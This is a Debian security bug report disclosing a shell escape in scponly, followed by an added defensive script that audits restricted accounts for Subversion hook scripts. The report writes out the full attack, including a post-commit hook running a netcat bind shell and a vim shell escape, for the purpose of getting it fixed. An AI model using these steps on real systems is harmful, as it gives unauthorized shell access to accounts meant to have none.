Package: scponly
Version: 4.6-1
X-Debbugs-CC: [EMAIL PROTECTED]
Severity: grave
Tags: security

Hi Thomas Wana, messing around with some friends here, I tried to access his computer with only a scponly protected account. I discovered this way of gaining full shell access:

I locally created a subversion repository /tmp/blubb with a /tmp/blubb/hooks/post-commit that contains the command:

    ( nc -l -p 1042 -e /bin/bash) &

I copy this repository using

    scp -r /tmp/blubb/ [EMAIL PROTECTED]:

Then I check out the repository remotely:

    ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla

Now I add a file and commit it:

    touch blah
    scp blah [EMAIL PROTECTED]:bla/
    ssh [EMAIL PROTECTED] /usr/bin/svn ci bla

At this point, I have a vim instance running, asking me for the commit message. I could now just run :!/bin/bash to get a shell, but having done the post-commit hook already, I want to use that, so I write something and quit the editor with :x

At this point, I can use

    nc host 1042

and I have a shell for the account that should have none.

The solution would be: Do not enable access to svn (or svnserve), which is a simple compilation option.

I’d appreciate it if this gets fixed in Debian etch. I have sent this information to [EMAIL PROTECTED] and scponly’s upstream maintainer last week, but have not yet gotten a response.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
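A defensive check for the condition this report describes, added here as an example and not part of the original report or of scponly: it lists executable Subversion hook scripts found under the home directories of accounts whose login shell is scponly. The passwd-format input file, the shell names `scponly`/`scponlyc`, the function names and the optional root prefix are assumptions of the example.

```shell
#!/bin/sh
# Added example: audit scponly accounts for live Subversion hook scripts.
# Assumptions: passwd(5)-format input; restricted shells are named
# "scponly" or "scponlyc"; ROOT is an optional prefix for offline images.

# Print "user:home" for every account whose login shell is scponly.
list_scponly_users() {
    awk -F: '$7 ~ /\/scponlyc?$/ { print $1 ":" $6 }' "$1"
}

# Print owner-executable hook scripts that sit inside a Subversion
# repository (a directory holding "format", "db/" and "hooks/") below $1.
# Template files (*.tmpl) shipped by svnadmin are ignored.
find_live_hooks() {
    find "$1" -type f -path '*/hooks/*' ! -name '*.tmpl' -perm -100 2>/dev/null |
    while IFS= read -r hook; do
        repo=${hook%/hooks/*}
        if [ -f "$repo/format" ] && [ -d "$repo/db" ]; then
            printf '%s\n' "$hook"
        fi
    done
}

# audit PASSWD_FILE [ROOT]: print "user hook-path" for each finding.
audit() {
    list_scponly_users "$1" | while IFS=: read -r user home; do
        find_live_hooks "${2:-}$home" | while IFS= read -r hook; do
            printf '%s %s\n' "$user" "$hook"
        done
    done
}

# When run with arguments, e.g. "sh audit.sh /etc/passwd", audit directly.
if [ "$#" -gt 0 ]; then audit "$@"; fi
```

A finding means a repository with an executable hook is present in a restricted account's home; it does not by itself show that the hook was run.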